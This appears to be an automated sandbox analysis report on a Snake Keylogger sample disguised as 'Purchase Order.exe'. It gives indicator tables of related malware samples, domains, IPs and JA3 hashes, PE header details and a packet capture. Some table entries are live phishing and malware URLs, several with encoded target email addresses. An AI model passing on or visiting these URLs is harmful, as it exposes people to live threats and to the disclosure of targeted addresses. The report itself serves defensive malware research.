	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse
	8wvP84hzFu.exe	Get hash	malicious	Snake Keylogger	Browse
	SDTP098766700000.exe	Get hash	malicious	Snake Keylogger	Browse
	sipari#U015f formu_831512.exe	Get hash	malicious	Snake Keylogger	Browse
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	132.226.247.73
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	lxdriver_setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	158.101.44.242
	iCareFone.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	193.122.130.0
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	193.122.6.168
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	132.226.8.169
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	193.122.130.0
scratchdreams.tk	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.27.85
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.169.18
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.27.85
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.169.18
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.169.18
	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
us2.smtp.mailhostbox.com	Solicitud de cotizacion.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	208.91.199.224
	cgprgRztWc.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	208.91.199.224
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	208.91.198.143
	Dhl 984857.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	Dhl 0393837.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	208.91.199.225
	SecuriteInfo.com.Win32.TrojanX-gen.27067.30548.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	6P8VytD7wo.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
reallyfreegeoip.org	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.67.152
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.67.152
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ORACLE-BMC-31898US	mrPTE618YB.exe	Get hash	malicious	PureLog Stealer	Browse	150.136.132.149
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	lxdriver_setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	158.101.44.242
	iCareFone.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	193.122.130.0
	http://winning.com.de/4LcLKX1386KvIx6mvpavrrenj4MMBOXAWOTDNDYZC32415IMVO1140976R30	Get hash	malicious	Unknown	Browse	193.122.130.38
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	http://evvitteponn.info/	Get hash	malicious	HTMLPhisher	Browse	150.136.26.45
	http://zarabidarix.xyz/4kKUDf2271ibnX494fplpivknze26JVIISAKNWCQFBYE13955JAYA338314o10	Get hash	malicious	Unknown	Browse	193.122.130.38
	http://zarabidarix.xyz/4kKUDf2271ibnX494fplpivknze26JVIISAKNWCQFBYE13955JAYA338314o10	Get hash	malicious	Unknown	Browse	150.136.26.45
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	193.122.6.168
CLOUDFLARENETUS	Azizi Riviera Azure works.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	CMLite.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.61.25
	https://d9b611d54db558e2a1247d0c1daf60.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	172.66.47.40
	7qAKRRMho6.exe	Get hash	malicious	GCleaner, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	172.67.180.119
	https://cloudflare-ipfs.com/ipfs/bafybeietrput6vduyab6yehqojnetajrdxz5h62zvthflhqahtshlqcto4#f32io/ZnJhbmsuam9uZXNAZmJpLmdvdg	Get hash	malicious	Unknown	Browse	172.67.149.187
	proforma invoice.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	hoDogZKrIh.exe	Get hash	malicious	Meduza Stealer	Browse	172.67.74.152
	CryptoWire-win64.exe	Get hash	malicious	CryptoWire, JackSparrow	Browse	104.17.137.37
	https://flow.page/aramark.com	Get hash	malicious	Unknown	Browse	104.16.79.73
	BitwarSetup.exe	Get hash	malicious	Unknown	Browse	104.22.24.131
PUBLIC-DOMAIN-REGISTRYUS	INVOICE_FEB-888201-2024.exe	Get hash	malicious	AgentTesla	Browse	162.222.226.100
	Solicitud de cotizacion.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	208.91.199.224
	https://m.exactag.com/ai.aspx?tc=d9584755bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Ahilanddalry.net%2Ftoro%2F05752%2F%2FYmlsbF9iaWViZXJpdHpAdHJla2Jpa2VzLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	162.222.227.139
	SHIPPING ADVICE.exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249
	INVOICE_FEB-888201-2024.exe	Get hash	malicious	AgentTesla	Browse	162.222.226.100
	mGJWUAE5wa.exe	Get hash	malicious	AgentTesla	Browse	45.113.122.70
	1NJf6k6HU1.exe	Get hash	malicious	AgentTesla	Browse	45.113.122.70
	cgprgRztWc.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	208.91.199.224
CLOUDFLARENETUS	Azizi Riviera Azure works.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	CMLite.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.61.25
	https://d9b611d54db558e2a1247d0c1daf60.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	172.66.47.40
	7qAKRRMho6.exe	Get hash	malicious	GCleaner, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	172.67.180.119
	https://cloudflare-ipfs.com/ipfs/bafybeietrput6vduyab6yehqojnetajrdxz5h62zvthflhqahtshlqcto4#f32io/ZnJhbmsuam9uZXNAZmJpLmdvdg	Get hash	malicious	Unknown	Browse	172.67.149.187
	proforma invoice.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	hoDogZKrIh.exe	Get hash	malicious	Meduza Stealer	Browse	172.67.74.152
	CryptoWire-win64.exe	Get hash	malicious	CryptoWire, JackSparrow	Browse	104.17.137.37
	https://flow.page/aramark.com	Get hash	malicious	Unknown	Browse	104.16.79.73
	BitwarSetup.exe	Get hash	malicious	Unknown	Browse	104.22.24.131

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Fuy2BDS9W2.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	lxdriver_setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.177.134
	iCareFone.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	172.67.177.134
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
3b5074b1b5d032e5620f69f9f700ff0e	Azizi Riviera Azure works.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	CMLite.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.21.27.85
	proforma invoice.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	SecuriteInfo.com.Win32.CrypterX-gen.23422.3824.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	SecuriteInfo.com.Win32.CrypterX-gen.2006.1539.exe	Get hash	malicious	AgentTesla	Browse	104.21.27.85
	SecuriteInfo.com.Heur.MSIL.Pretoria.1.29115.19571.exe	Get hash	malicious	PureLog Stealer, RedLine, zgRAT	Browse	104.21.27.85
	Update.js	Get hash	malicious	SocGholish	Browse	104.21.27.85
	http://service.clearservice.com/constructionns/track/link.jsp?id1=3575627&id2=1894706318&link=//charmrecruit.co.za/php/Dan%20Getman//////////////////////qrllcqmfcyfbkklbtsvmnxflhduinzoudzmdfehgeaqhxlreok/czrvmgrgyhZGFuLmdldG1hbkBjYXBlbGxhc3BhY2UuY29t~lg=pricepaidonsweat919	Get hash	malicious	Unknown	Browse	104.21.27.85
	https://t.co/hdiSybxDVY	Get hash	malicious	HTMLPhisher	Browse	104.21.27.85
	https://click.email.active.com/f/a/IEb07oHmlXOs1Bmu-Sgyyw~~/AAOtGgA~/RgRn8XLwP0R7aHR0cHM6Ly9jb21tdXNlcnVpLmFjdGl2ZS5jb20vY2xpY2svMS8xNzExMjQyMzAyLzdkOGI0ZWQyLWY1N2YtNGZmMC05YzdlLTJlM2QzNDBlOTNhMi8xMTM2QTJBMS1GQjlBLTRBRkYtQTExNC00MjczNUJCRjY3N0QvVwNzcGNCCmYE9u0OZlv3SIFSEmptaXRjaGFuZXJAYXJhLmNvbVgEAAAACw~~	Get hash	malicious	HTMLPhisher	Browse	104.21.27.85

Process:	C:\Users\user\Desktop\Purchase Order.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.975423186525271
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Purchase Order.exe
File size:	502'784 bytes
MD5:	10e2a14bbd30f30c2cb7260741a3d70f
SHA1:	aaf6c61c6f5e908e164de1b539096caf9fd9b4d2
SHA256:	8fb359ccf3a3b6a0eff8204f9ee27c2dc41b3270721716192a7ef9253453b59b
SHA512:	c5c6f9aaad1299239264b0a4ae2012f0ef477bca2f28d7c6900893e8f81141c5b5113979b50f25dd5637da332e4418bd96a3000a9307c0e4e9542ace2a512618
SSDEEP:	12288:r5UHYFLi26lnnhwrqslyuBRlGxR7LBGJi:KHYFLiPlhwGKyuLlGxtwY
TLSH:	92B4235064AD27BBC4FA8FBB08B24081D3F125B99663D1793DC781E859A0719DAC4FE3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...d8.f..............0.................. ........@.. ....................... ............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x47bffe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x660F3864 [Thu Apr 4 23:31:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
xor al, 38h
xor eax, 38483446h
xor al, 47h
dec eax
xor eax, 00003447h
add byte ptr [edx], dh
inc ebx
inc edx
push ebx
aaa
dec eax
xor eax, 00003439h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7bfab	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7e000	0x5b4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x80000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x7adb4	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7a024	0x7a200	ab58f7de124c215aeb23c045d0864665	False	0.9754649916837257	data	7.98179362017261	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x7e000	0x5b4	0x600	470e216cab9908f7171750a41574f96b	False	0.42578125	data	4.111155685471833	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x80000	0xc	0x200	1552f733870b071e7f877f12495077e4	False	0.041015625	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x7e090	0x324	data			0.43283582089552236
RT_MANIFEST	0x7e3c4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 5, 2024 08:21:15.248630047 CEST	49711	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:15.427361012 CEST	80	49711	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:15.427447081 CEST	49711	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:15.427875042 CEST	49711	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:15.608292103 CEST	80	49711	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:17.498852968 CEST	80	49711	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:17.505232096 CEST	49711	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:17.683943987 CEST	80	49711	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:17.700793028 CEST	80	49711	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:17.744505882 CEST	49711	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:17.872149944 CEST	49712	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:17.872195005 CEST	443	49712	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:17.872262955 CEST	49712	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:17.879503965 CEST	49712	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:17.879520893 CEST	443	49712	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:18.142963886 CEST	443	49712	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:18.143230915 CEST	49712	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:18.148150921 CEST	49712	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:18.148159981 CEST	443	49712	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:18.148466110 CEST	443	49712	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:18.197628975 CEST	49712	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:18.199620962 CEST	49712	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:18.244245052 CEST	443	49712	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:18.437421083 CEST	443	49712	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:18.437582016 CEST	443	49712	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:18.437659025 CEST	49712	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:18.444600105 CEST	49712	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:18.448924065 CEST	49711	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:18.688565969 CEST	80	49711	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:18.691540003 CEST	49713	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:18.691580057 CEST	443	49713	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:18.691664934 CEST	49713	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:18.692048073 CEST	49713	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:18.692065001 CEST	443	49713	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:18.744656086 CEST	49711	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:18.947568893 CEST	443	49713	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:18.949984074 CEST	49713	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:18.950010061 CEST	443	49713	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:19.244012117 CEST	443	49713	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:19.244131088 CEST	443	49713	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:19.244184971 CEST	49713	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:19.244771957 CEST	49713	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:19.248970032 CEST	49711	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:19.250264883 CEST	49714	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:19.428558111 CEST	80	49711	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:19.428658962 CEST	49711	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:19.428924084 CEST	80	49714	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:19.429016113 CEST	49714	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:19.429409027 CEST	49714	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:19.608680964 CEST	80	49714	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:21.604031086 CEST	80	49714	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:21.605720997 CEST	49715	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:21.605758905 CEST	443	49715	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:21.605823994 CEST	49715	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:21.606123924 CEST	49715	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:21.606137037 CEST	443	49715	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:21.650818110 CEST	49714	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:21.861169100 CEST	443	49715	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:21.863766909 CEST	49715	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:21.863786936 CEST	443	49715	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:22.158835888 CEST	443	49715	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:22.158926010 CEST	443	49715	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:22.159650087 CEST	49715	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:22.160196066 CEST	49715	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:22.166718006 CEST	49716	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:22.346327066 CEST	80	49716	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:22.346412897 CEST	49716	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:22.346605062 CEST	49716	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:22.526118994 CEST	80	49716	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:22.691642046 CEST	80	49716	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:22.744530916 CEST	49716	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:22.913713932 CEST	49717	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:22.913749933 CEST	443	49717	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:22.913810015 CEST	49717	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:22.914094925 CEST	49717	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:22.914108038 CEST	443	49717	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:23.170727015 CEST	443	49717	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:23.172319889 CEST	49717	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:23.172353983 CEST	443	49717	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:23.468487024 CEST	443	49717	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:23.468606949 CEST	443	49717	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:23.468687057 CEST	49717	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:24.880091906 CEST	49717	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:25.055737019 CEST	49716	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:25.056427002 CEST	49718	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:25.236385107 CEST	80	49718	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:25.236418009 CEST	80	49716	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:25.236502886 CEST	49718	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:25.236541986 CEST	49716	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:25.236736059 CEST	49718	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:25.416851997 CEST	80	49718	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:26.608462095 CEST	80	49718	158.101.44.242	192.168.2.9
Apr 5, 2024 08:21:26.610061884 CEST	49721	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:26.610101938 CEST	443	49721	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:26.610168934 CEST	49721	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:26.610486984 CEST	49721	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:26.610501051 CEST	443	49721	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:26.650834084 CEST	49718	80	192.168.2.9	158.101.44.242
Apr 5, 2024 08:21:26.867822886 CEST	443	49721	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:26.869625092 CEST	49721	443	192.168.2.9	172.67.177.134
Apr 5, 2024 08:21:26.869647026 CEST	443	49721	172.67.177.134	192.168.2.9
Apr 5, 2024 08:21:27.164947033 CEST	443	49721	172.67.177.134	192.168.2.9
